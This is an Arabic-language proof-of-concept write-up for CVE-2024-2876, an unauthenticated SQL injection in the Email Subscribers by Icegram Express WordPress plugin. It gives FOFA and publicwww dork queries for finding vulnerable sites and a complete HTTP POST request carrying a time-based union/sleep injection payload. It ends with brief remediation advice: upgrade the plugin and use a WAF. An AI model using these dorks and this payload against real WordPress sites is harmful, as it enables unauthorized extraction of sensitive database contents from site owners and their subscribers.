
إثبات مفهوم لـ CVE-2024-2876، وهو حقن SQL غير مُصادَق عليه في إضافة Email Subscribers لـ WordPress، مع استعلامات dork وطلب استغلال فعّال.
#وصف الثغرة: إن إضافة Email Subscribers by Icegram Express – Email Marketing, Newsletters, Automation for WordPress & WooCommerce الخاصة بـ WordPress معرّضة لثغرة SQL Injection عبر دالة 'run' في الصنف 'IG_ES_Subscribers_Query' في جميع الإصدارات حتى الإصدار 5.7.14 ضمناً، وذلك بسبب عدم كفاية التهريب (escaping) على المعامل المُدخَل من المستخدم وعدم كفاية التحضير (preparation) في استعلام SQL الحالي. وهذا يتيح للمهاجمين غير المصادَق عليهم إلحاق استعلامات SQL إضافية داخل الاستعلامات الموجودة مسبقاً، والتي يمكن استخدامها لاستخراج معلومات حساسة من قاعدة البيانات.
#Dork: 1- FOFA : body="/wp-content/plugins/email-subscribers/" 2- publicwww : "/wp-content/plugins/email-subscribers/"
#POC: POST /wp-admin/admin-post.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111
#Youtube POC: https://www.youtube.com/watch?v=eDEGt_yXyvE
#كيفية الإصلاح؟ نظراً لأن جميع الإصدارات حتى 5.7.14 تم اكتشاف إصابتها بهذه الثغرة (CVE)، يُوصى للمستخدمين بترقية إضافة Email Subscribers by Icegram Express إلى الإصدار 5.7.15 (أو أحدث إصدار 5.7.19). يتوفر لمستخدمي Patchstack خيار تمكين التحديثات التلقائية تحديداً للإضافات المعرّضة للثغرات. طبّق حلاً من حلول WAF/WAAP كطبقة حماية إضافية. وتكمن ميزة هذه الحلول في أنه حتى لو كانت الثغرة جديدة وغير معروفة (0-day)، فقد تظل قادرة على منع الهجمات من خلال اكتشاف أنماط وتقنيات الاستغلال.